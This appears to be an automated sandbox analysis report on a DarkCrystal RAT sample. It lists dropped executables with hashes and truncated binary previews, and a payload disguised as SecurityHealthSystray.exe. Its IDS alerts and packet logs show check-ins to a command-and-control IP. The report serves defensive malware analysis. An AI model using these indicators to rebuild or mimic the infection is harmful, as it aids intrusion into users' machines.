Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................V...}..................0..C.......(....o.......(....(....o.......(....s......(...........o....o.......0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..

C:\Users\user\Desktop\iUeApcrA.log

Download File

Process:	C:\Users\user\Desktop\k1iZHyRK6K.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\pZlzyQSG.log

Download File

Process:	C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	22016
Entropy (8bit):	5.41854385721431
Encrypted:	false
SSDEEP:	384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
MD5:	BBDE7073BAAC996447F749992D65FFBA
SHA1:	2DA17B715689186ABEE25419A59C280800F7EDDE
SHA-256:	1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
SHA-512:	0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\rpUzavtu.log

Download File

Process:	C:\Users\user\Desktop\k1iZHyRK6K.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\tzrAaNYu.log

Download File

Process:	C:\Users\user\Desktop\k1iZHyRK6K.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	22016
Entropy (8bit):	5.41854385721431
Encrypted:	false
SSDEEP:	384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
MD5:	BBDE7073BAAC996447F749992D65FFBA
SHA1:	2DA17B715689186ABEE25419A59C280800F7EDDE
SHA-256:	1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
SHA-512:	0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\xMRpRwBk.log

Download File

Process:	C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	22016
Entropy (8bit):	5.41854385721431
Encrypted:	false
SSDEEP:	384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
MD5:	BBDE7073BAAC996447F749992D65FFBA
SHA1:	2DA17B715689186ABEE25419A59C280800F7EDDE
SHA-256:	1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
SHA-512:	0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\xqQPBCLW.log

Download File

Process:	C:\Users\user\Desktop\k1iZHyRK6K.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\zIEPhtYo.log

Download File

Process:	C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Videos\e589e10572e94b

Download File

Process:	C:\Users\user\Desktop\k1iZHyRK6K.exe
File Type:	ASCII text, with very long lines (654), with no line terminators
Category:	dropped
Size (bytes):	654
Entropy (8bit):	5.872495976865127
Encrypted:	false
SSDEEP:	12:oqDCLHigCkrnpQmJjIOlZOq1Kni1UvW6Ax6cei0SuzgIDXKcwqM+tOF:o2gBnH1Kni1gTAx6cexSqZrFMpF
MD5:	95370142B55809A49A3E5C9CCC3BEBD1
SHA1:	1DCA1128C341D683F0A453D606385559FF5A0BEA
SHA-256:	A1E08E19F20101C09410F454F129FB05B4E7F9BBFC143507CB40975858A842E7
SHA-512:	16E655367E3E4A5DDAD1BA3ECE802D3D557857E94D3F030900DE5CCFB7192058AA83D03E2F86E9F685B8099B9DE9184D6BA618BDC45DE6CBD9E74DB775C219DF
Malicious:	false
Preview:	Bp4Itdcnfs7FpqCkTDavoZy4IfrsH7bTJKIr05VccnaCVKkFH7YQSNAl0AAOvtfiRn6eiUuYs8SA9wj84mkKjLA5Kg105GqtI2vrNFhxM9iU59mEaBTJJV9GnBUBc4dlRj2HA2uzFx8jmq9K4wZ3whjw2pEMufURg6CWHfEiReEWXad6BKHqfkyu9FOVyhEjcqCqonCZs0lScNZcLHLkYow6HRXCQsutZe3qXwSYHs7o8gRvpvJqWeLx3GiWPAI9G138TsFZywcpqI7l9lWfjDW4TFxRN6IHk7iGnTc7qu1kBfHuI7WoomaCe8oN4xL2oVFtk18qJYyzMw3x8CIQjec7hflooOC2j95qaXKR9qfPyl0sF1P1p4TK3ILEPTB5W6PN1MXk21Q28MJ5p3jx9KNopvwRMFBqpk31Vm02eo9xoaLq9PYWtO5LtlhFZFYx0kNYTRkCCrTVLZAPkGS6qp6borIuFvcYPM7EMwXrpVTC4kATkRfTwcGKnwulI07RO4F9c6DxtkQVW4gDrzJxPJlwFwaZCwizYBy9fB0oOskLLuytQq3TqJBFTS3qfnu7Cb6UFgiq8ejhiZlV7rIV2PIOAsqMIKJk7nJuyenuINULkeg3risyeZEwSrUXzWiyV8k5P0gdDYNo57

C:\Users\user\Videos\lMBSkpoWMYaHkUMNHfb.exe

Download File

Process:	C:\Users\user\Desktop\k1iZHyRK6K.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	875520
Entropy (8bit):	5.423523110623198
Encrypted:	false
SSDEEP:	12288:I/TnPz84JfpflKH6qHJJMA+7pW3Ari4VVyZC0+1cp9rcDNpTWDTQGCZ6:I/TnzfS6qpJMA+73iE0nTr66
MD5:	5780DBAE6AC61A88C8D89F216F324146
SHA1:	CEBCEBEDC7AAEA3A4DD1FBEC933CD169BF92E9DC
SHA-256:	4B1967B04039C9B7A23651043B38C895CCA2EB560DE30A960368F82549079605
SHA-512:	8A595384247649E31EF0C69A63243199D224334D75B66FD486A8E6BA0AC3C2B5521E1EAD4B64FB9C968C21A4836581DDE10E78F36217B62862C40BED2D105920
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*..g.................T...........r... ........@.. ....................................@.................................xr..S....... ............................................................................ ............... ..H............text....R... ...T.................. ..`.rsrc... ............V..............@..@.reloc...............Z..............@..B.................r......H.......X... .......v...................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Videos\lMBSkpoWMYaHkUMNHfb.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\k1iZHyRK6K.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\System32\CSCC093A9EE2E0C4098883B2A265DAA859.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	1224
Entropy (8bit):	4.435108676655666
Encrypted:	false
SSDEEP:	24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
MD5:	931E1E72E561761F8A74F57989D1EA0A
SHA1:	B66268B9D02EC855EB91A5018C43049B4458AB16
SHA-256:	093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
SHA-512:	1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
Malicious:	false
Preview:	.... ...........................\|...<...............0...........\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

C:\Windows\System32\SecurityHealthSystray.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.991626382378824
Encrypted:	false
SSDEEP:	48:6bp/PtP+M7Jt8Bs3FJsdcV4MKe277dJUDUKDvqBHSOulajfqXSfbNtm:SP1Pc+Vx9MPUDzvk8cjRzNt
MD5:	6D3969FFE402F5FF5D2F8254C5F67924
SHA1:	1B4476A3859C4746EEB588EAAB6185F1A4F52C3F
SHA-256:	6407B1D3837BC68C548798DC68E72CA986396DCC40DF5A9CD6054658EE90BAA8
SHA-512:	444D864E0C7082A3DB9BFE7BF3F4376092683A78C5F9134CF01FA07E825D03C6BF4523DEB93D347349589C39F13447A6AD8AEABB2AB198A981FBA30FCC00B587
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....&g.............................'... ...@....@.. ....................................@..................................'..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..`.............................................................(.....0..!.......r...pre..p.{....(....(....&..&......................0..........ri..p(....&..&......................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(......(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.0.......#GUID...@... ...#Blob...........WU........%3................................................................

\Device\Null

Download File

Process:	C:\Windows\System32\w32tm.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	151
Entropy (8bit):	4.78266492983033
Encrypted:	false
SSDEEP:	3:VLV993J+miJWEoJ8FXyUUPbeLLAXXKvrPWOLEKvj:Vx993DEUENANOYs
MD5:	11E46BEF6575A8017A8777028A9104C2
SHA1:	C69C9D69D923BE75BA24AF52F701B23208CBD552
SHA-256:	CE74DB0F1C099A8EC5B3BF82B27F3D7A99980E324339F2EA9EDD2A1FABA067AF
SHA-512:	1CC5FD7B21B7D1B48E664650C8AE4E2F7FC6938EB824709C2F4719D37C8F1DB15381CA7A6962DC813FADE5F74EE50267F999667291AAF2A1ABD127C8DA43B881
Malicious:	false
Preview:	Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 02/11/2024 22:33:10..22:33:10, error: 0x80072746.22:33:15, error: 0x80072746.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.423523110623198
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.79% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Win16/32 Executable Delphi generic (2074/23) 0.01%
File name:	k1iZHyRK6K.exe
File size:	875'520 bytes
MD5:	5780dbae6ac61a88c8d89f216f324146
SHA1:	cebcebedc7aaea3a4dd1fbec933cd169bf92e9dc
SHA256:	4b1967b04039c9b7a23651043b38c895cca2eb560de30a960368f82549079605
SHA512:	8a595384247649e31ef0c69a63243199d224334d75b66fd486a8e6ba0ac3c2b5521e1ead4b64fb9c968c21a4836581dde10e78f36217b62862c40bed2d105920
SSDEEP:	12288:I/TnPz84JfpflKH6qHJJMA+7pW3Ari4VVyZC0+1cp9rcDNpTWDTQGCZ6:I/TnzfS6qpJMA+73iE0nTr66
TLSH:	2215F9282AEE543AF0B3AFB54BD47986C5AEF5B3770E954D18C103C68212740DE9673B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*..g.................T...........r... ........@.. ....................................@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4d72ce
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6717F42A [Tue Oct 22 18:51:22 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xd7278	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd8000	0x320	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xda000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xd52d4	0xd5400	c47f014c270ba4231b525b8b6747135a	False	0.42368501795134816	data	5.429324952923105	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xd8000	0x320	0x400	d5e250a5164a84150836096af3bdda89	False	0.3525390625	data	2.651038093332615	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xda000	0xc	0x200	0ed934834893b99e008bce13125b64ff	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xd8058	0x2c8	data			0.46207865168539325

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-03T02:32:00.954111+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49731	34.117.59.81	443	TCP
2024-11-03T02:32:01.938898+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49732	34.117.59.81	443	TCP
2024-11-03T02:32:13.276414+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49733	37.44.238.250	80	TCP
2024-11-03T02:32:16.428299+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.175.87.197	443	192.168.2.4	49734	TCP
2024-11-03T02:32:36.148392+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49740	37.44.238.250	80	TCP
2024-11-03T02:32:44.308445+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49741	37.44.238.250	80	TCP
2024-11-03T02:32:52.215984+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49743	37.44.238.250	80	TCP
2024-11-03T02:32:53.791671+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49744	37.44.238.250	80	TCP
2024-11-03T02:32:57.868359+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.175.87.197	443	192.168.2.4	49746	TCP
2024-11-03T02:33:16.681374+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49828	37.44.238.250	80	TCP
2024-11-03T02:33:25.145277+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49865	37.44.238.250	80	TCP
2024-11-03T02:33:27.261821+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49875	37.44.238.250	80	TCP
2024-11-03T02:33:33.650847+0100	2048095	ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)	1	192.168.2.4	49903	37.44.238.250	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 3, 2024 02:31:58.885932922 CET	49730	443	192.168.2.4	34.117.59.81
Nov 3, 2024 02:31:58.885981083 CET	443	49730	34.117.59.81	192.168.2.4
Nov 3, 2024 02:31:58.886045933 CET	49730	443	192.168.2.4	34.117.59.81
Nov 3, 2024 02:31:58.897336006 CET	49730	443	192.168.2.4	34.117.59.81
Nov 3, 2024 02:31:58.897353888 CET	443	49730	34.117.59.81	192.168.2.4
Nov 3, 2024 02:31:59.666296005 CET	443	49730	34.117.59.81	192.168.2.4
Nov 3, 2024 02:31:59.666359901 CET	49730	443	192.168.2.4	34.117.59.81
Nov 3, 2024 02:31:59.669418097 CET	49730	443	192.168.2.4	34.117.59.81
Nov 3, 2024 02:31:59.669430971 CET	443	49730	34.117.59.81	192.168.2.4
Nov 3, 2024 02:31:59.669681072 CET	443	49730	34.117.59.81	192.168.2.4
Nov 3, 2024 02:31:59.723813057 CET	49730	443	192.168.2.4	34.117.59.81
Nov 3, 2024 02:31:59.725064993 CET	49730	443	192.168.2.4	34.117.59.81
Nov 3, 2024 02:31:59.767337084 CET	443	49730	34.117.59.81	192.168.2.4
Nov 3, 2024 02:31:59.931051970 CET	443	49730	34.117.59.81	192.168.2.4
Nov 3, 2024 02:31:59.932698965 CET	443	49730	34.117.59.81	192.168.2.4
